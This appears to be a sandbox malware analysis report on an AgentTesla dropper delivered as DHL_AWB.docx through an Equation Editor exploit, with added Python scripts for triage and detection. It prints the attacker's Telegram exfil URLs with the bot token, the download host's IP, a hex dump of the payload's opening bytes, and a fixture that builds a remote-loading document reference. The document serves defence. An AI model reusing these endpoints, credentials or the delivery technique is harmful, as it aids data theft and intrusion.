Windows Analysis Report
DHL_AWB.docx

Overview

General Information

Sample Name: DHL_AWB.docx
Analysis ID: 679368
MD5: aaea73067b34013e5c1c9715dcf715a4
SHA1: a1cf21c352a13b91a2b0ab22c4367e07151c4292
SHA256: c7351eddf1e255e0b5d5d6c7dbd054427f5fef62b7cd9d25b67166e57df21d9b
Tags: doc

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Shellcode detected
Yara detected Generic Downloader
Office equation editor drops PE file
Contains an external reference to another file
Machine Learning detection for dropped file
Office equation editor establishes network connection
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Binary contains a suspicious time stamp
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
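
The signatures "Contains an external reference to another file" and "Document misses a certain OLE stream" together with the downloaded doc_200[1].doc describe the delivery chain: the .docx itself carries no exploit, it holds a relationship with TargetMode="External" that makes Word fetch the RTF stage carrying the Equation Editor exploit. The following triage script is an added example and is not Joe Sandbox code; it builds a minimal .docx in memory (constructed, not the report's sample) and lists every external relationship, separating relationship types Word resolves on open (the AUTO_LOAD_TYPES set is a heuristic chosen for this example) from ordinary hyperlinks. The second-stage URL used in the sample is hypothetical.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Relationship types Word resolves automatically when the document opens, so an External
# target of one of these pulls a second stage with no click. Heuristic list chosen for this
# example; hyperlinks are excluded on purpose because they need user interaction.
AUTO_LOAD_TYPES = {"oleObject", "attachedTemplate", "frame", "subDocument"}
REMOTE_SCHEMES = ("http://", "https://", "file://", "\\\\")


def external_relationships(docx_bytes):
    """List every relationship in any *.rels part that has TargetMode="External".

    Returns tuples of (rels_part, rel_id, short_type, target)."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                if rel.get("TargetMode") == "External":
                    short_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    found.append((name, rel.get("Id"), short_type, rel.get("Target", "")))
    return found


def remote_loaders(docx_bytes):
    """Subset of external_relationships() that fetches a remote file without a click."""
    return [r for r in external_relationships(docx_bytes)
            if r[2] in AUTO_LOAD_TYPES and r[3].lower().startswith(REMOTE_SCHEMES)]


def build_sample_docx(remote_ole_target=None):
    """Construct a minimal .docx in memory (constructed for this example, not the report's sample).

    It always carries a benign external hyperlink; when remote_ole_target is given it also
    carries an External oleObject relationship pointing at that URL, the shape Word
    resolves (and downloads) as soon as the document is opened."""
    rels = [f'<Relationship Id="rId1" Type="{OFFICE_REL}hyperlink" '
            'Target="https://www.example.com/" TargetMode="External"/>']
    if remote_ole_target:
        rels.append(f'<Relationship Id="rId2" Type="{OFFICE_REL}oleObject" '
                    f'Target="{remote_ole_target}" TargetMode="External"/>')
    body = "".join(rels)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                   '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
                   '<Default Extension="xml" ContentType="application/xml"/></Types>')
        z.writestr("_rels/.rels",
                   f'<Relationships xmlns="{PKG_REL_NS}"><Relationship Id="rId1" '
                   f'Type="{OFFICE_REL}officeDocument" Target="word/document.xml"/></Relationships>')
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                   '<w:body/></w:document>')
        z.writestr("word/_rels/document.xml.rels",
                   f'<Relationships xmlns="{PKG_REL_NS}">{body}</Relationships>')
    return buf.getvalue()


if __name__ == "__main__":
    # Hypothetical second-stage URL; the host the report actually observed is 198.23.207.54.
    sample = build_sample_docx("http://stage.example.invalid/doc_200.doc")
    for part, rid, rtype, target in external_relationships(sample):
        print(f"{part}: {rid} {rtype} -> {target}")
    print("auto-loading remote reference:", bool(remote_loaders(sample)))
```

Running this against a real sample is a zip-and-XML read only, so it is safe on an analyst workstation; the point is that the .docx hash alone (22% VirusTotal) says little, while the external oleObject or attachedTemplate target is the indicator that links it to the RTF stage and the download host.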

Classification

AV Detection

Source: DHL_AWB.docx Virustotal: Detection: 22%
Source: DHL_AWB.docx ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe Avira: detection malicious, Label: TR/AD.AgentTesla.qwkzk
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\694BA9C1.doc Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\Public\vbc.exe Avira: detection malicious, Label: TR/AD.AgentTesla.qwkzk
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{61C0FE69-632E-42B0-9EAB-CB8720AB2605}.tmp Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc_200[1].doc Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe Metadefender: Detection: 31%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe ReversingLabs: Detection: 92%
Source: C:\Users\Public\vbc.exe Metadefender: Detection: 31%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: 10.2.vbc.exe.331cbe8.10.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1952161154", "Chat URL": "https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument"}
Source: vbc.exe.2192.10.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendMessage"}
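
Both configuration lines point at the same Telegram bot: the sendDocument URL carries the AgentTesla exfil and the sendMessage URL is what triggers the "Telegram RAT" Yara rule. The bot token (the part after /bot) and the chat id are the actionable indicators, since every Telegram-based stealer build embeds them in clear text. The script below is an added example, not Joe Sandbox's configuration extractor; it runs over a list of strings pulled from process memory (the SAMPLE_STRINGS list is constructed; only the two URLs are taken from the report) and returns a structured, defanged IOC record. The assumption that the numeric chat id follows a standalone "chat_id" string is typical of .NET stealer string tables but has not been verified against this sample.

```python
import re

# Telegram Bot API URL: https://api.telegram.org/bot<bot_id>:<secret>/<method>
# The secret is typically 35 characters; a lower bound is used so minor variants still match.
TELEGRAM_URL_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{30,})/(?P<method>[A-Za-z]+)")
# chat_id sometimes appears inline as a query or form parameter
CHAT_ID_PARAM_RE = re.compile(r"chat_id=(?P<chat_id>-?\d{5,})")
NUMERIC_RE = re.compile(r"-?\d{5,}")

# Constructed excerpt of a strings dump (not the real memory strings of the report's
# vbc.exe); the two URLs are the ones the report's configuration extractor printed.
SAMPLE_STRINGS = [
    "System.Net.Mail.SmtpClient",
    "https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument",
    "https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendMessage",
    "chat_id",
    "1952161154",
    "document",
    "multipart/form-data; boundary=",
    "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
]


def extract_telegram_config(strings):
    """Recover Telegram exfil settings from strings pulled from process memory.

    Assumption (typical .NET string-table layout, not verified on this sample): the literal
    "chat_id" is followed by the numeric id as the next standalone numeric string, unless a
    chat_id=... parameter appears inline."""
    configs = {}
    chat_id = None
    expect_chat_id = False
    for s in strings:
        s = s.strip()
        if expect_chat_id and NUMERIC_RE.fullmatch(s):
            chat_id, expect_chat_id = s, False
        if s == "chat_id":
            expect_chat_id = True
        m = CHAT_ID_PARAM_RE.search(s)
        if m:
            chat_id = m["chat_id"]
        for m in TELEGRAM_URL_RE.finditer(s):
            cfg = configs.setdefault(m["bot_id"], {
                "bot_id": m["bot_id"],
                "token": f"{m['bot_id']}:{m['secret']}",
                "methods": set(),
            })
            cfg["methods"].add(m["method"])
    results = []
    for cfg in configs.values():
        results.append({
            "bot_id": cfg["bot_id"],
            "token": cfg["token"],
            "methods": sorted(cfg["methods"]),
            "chat_id": chat_id,
            # defanged form that is safe to paste into a ticket or a blocklist
            "c2_defanged": f"hxxps://api[.]telegram[.]org/bot{cfg['bot_id']}:<secret>/",
        })
    return results


if __name__ == "__main__":
    for cfg in extract_telegram_config(SAMPLE_STRINGS):
        print(cfg)
```

Because api.telegram.org is legitimate traffic on most networks, blocking the host is rarely an option; the bot id and token are the indicators worth sharing, and the same record covers both the sendDocument and sendMessage sightings.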

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 198.23.207.54 Port: 80
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
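
The three events above are the whole detection story for this sample: EQNEDT32.EXE is started out of process with -Embedding (the parent is "unknown" to the sandbox because the COM activation goes through svchost, not WINWORD), then the shellcode makes it download, write C:\Users\Public\vbc.exe and run it. Equation Editor renders formulas and does nothing else, so any process creation, executable write or network connection by that image is a high-confidence alert; the Sigma rule "File Dropped By EQNEDT32EXE" listed in the signatures covers the file-write case. The detection logic below is an added example, not Joe Sandbox's or the Sigma project's code; it evaluates constructed Sysmon-style events (field names follow Sysmon, the events themselves are modelled on the report's process tree and are not real log output) and returns the alerts a SIEM rule would raise.

```python
import ntpath

# Sysmon event IDs (standard numbering)
PROCESS_CREATE, NETWORK_CONNECT, FILE_CREATE = 1, 3, 11

EQNEDT_IMAGE = "eqnedt32.exe"
EXECUTABLE_EXT = (".exe", ".dll", ".scr", ".com")
EQN_PATH = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"

# Constructed Sysmon-style events modelled on the process tree in the report (not real logs).
SAMPLE_EVENTS = [
    {"EventID": PROCESS_CREATE, "Image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": '"WINWORD.EXE" /n DHL_AWB.docx'},
    # EQNEDT32 is launched through COM with -Embedding, so its parent is typically the
    # DCOM svchost rather than WINWORD; a rule keyed on ParentImage == WINWORD.EXE misses it.
    {"EventID": PROCESS_CREATE, "Image": EQN_PATH, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": f'"{EQN_PATH}" -Embedding'},
    {"EventID": NETWORK_CONNECT, "Image": EQN_PATH, "DestinationIp": "198.23.207.54", "DestinationPort": 80},
    {"EventID": FILE_CREATE, "Image": EQN_PATH, "TargetFilename": r"C:\Users\Public\vbc.exe"},
    {"EventID": PROCESS_CREATE, "Image": r"C:\Users\Public\vbc.exe", "ParentImage": EQN_PATH,
     "CommandLine": r"C:\Users\Public\vbc.exe"},
    {"EventID": PROCESS_CREATE, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]


def image_name(path):
    """Lower-cased file name of a Windows path, tolerant of missing fields."""
    return ntpath.basename(path or "").lower()


def detect_equation_editor_abuse(events):
    """Return (rule, detail) alerts for behaviour EQNEDT32.EXE never shows legitimately:
    spawning a child, writing an executable, or opening a network connection."""
    alerts = []
    for e in events:
        eid, image = e["EventID"], image_name(e.get("Image"))
        if eid == PROCESS_CREATE and image_name(e.get("ParentImage")) == EQNEDT_IMAGE:
            alerts.append(("eqnedt32_spawns_process", e["Image"]))
        elif eid == FILE_CREATE and image == EQNEDT_IMAGE \
                and e["TargetFilename"].lower().endswith(EXECUTABLE_EXT):
            alerts.append(("eqnedt32_drops_executable", e["TargetFilename"]))
        elif eid == NETWORK_CONNECT and image == EQNEDT_IMAGE:
            alerts.append(("eqnedt32_network_connection",
                           f"{e['DestinationIp']}:{e['DestinationPort']}"))
    return alerts


if __name__ == "__main__":
    for rule, detail in detect_equation_editor_abuse(SAMPLE_EVENTS):
        print(f"{rule}: {detail}")
```

The network-connection rule fires first in this chain, before anything touches disk, which is the earliest point at which an EDR can kill EQNEDT32.EXE and prevent the drop to C:\Users\Public.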

Software Vulnerabilities

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_036406E7 ShellExecuteW,ExitProcess, 9_2_036406E7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0364064C LoadLibraryW, 9_2_0364064C
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_036406B9 URLDownloadToFileW,ShellExecuteW,ExitProcess, 9_2_036406B9
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_03640666 URLDownloadToFileW,ShellExecuteW,ExitProcess, 9_2_03640666
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_036406D2 ShellExecuteW,ExitProcess, 9_2_036406D2
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0364070C ExitProcess, 9_2_0364070C
Source: global traffic TCP traffic: 192.168.2.22:49171 <-> 198.23.207.54:80 (bidirectional, multiple packets)
Source: global traffic TCP traffic: 192.168.2.22:49172 <-> 198.23.207.54:80 (bidirectional, multiple packets)
Source: global traffic TCP traffic: 192.168.2.22:49173 <-> 198.23.207.54:80 (bidirectional, multiple packets)
Source: global traffic TCP traffic: 192.168.2.22:49174 <-> 198.23.207.54:80 (bidirectional, multiple packets)
Source: global traffic TCP traffic: 192.168.2.22:49175 <-> 198.23.207.54:80 (bidirectional, multiple packets)
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80

Networking

Source: Yara match File source: 10.2.vbc.exe.331cbe8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.vbc.exe.32ae9a8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.vbc.exe.32e69c8.9.raw.unpack, type: UNPACKEDPE
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Aug 2022 14:36:14 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6Last-Modified: Tue, 19 Jul 2022 05:10:31 GMTETag: "cd000-5e42180eec4e9"Accept-Ranges: bytesContent-Length: 839680Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f 5d 9e ba 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 c8 0c 00 00 06 00 00 00 00 00 00 9a e6 0c 00 00 20 00 00 00 00 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 48 e6 0c 00 4f 00 00 00 00 00 0d 00 d8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 0c 00 00 00 2c e6 0c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 c6 0c 00 00 20 00 00 00 c8 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 03 00 00 00 00 0d 00 00 04 00 00 00 ca 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0d 00 00 02 00 00 00 ce 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c e6 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 70 5c 00 00 c4 58 00 00 03 00 00 00 37 00 00 06 34 
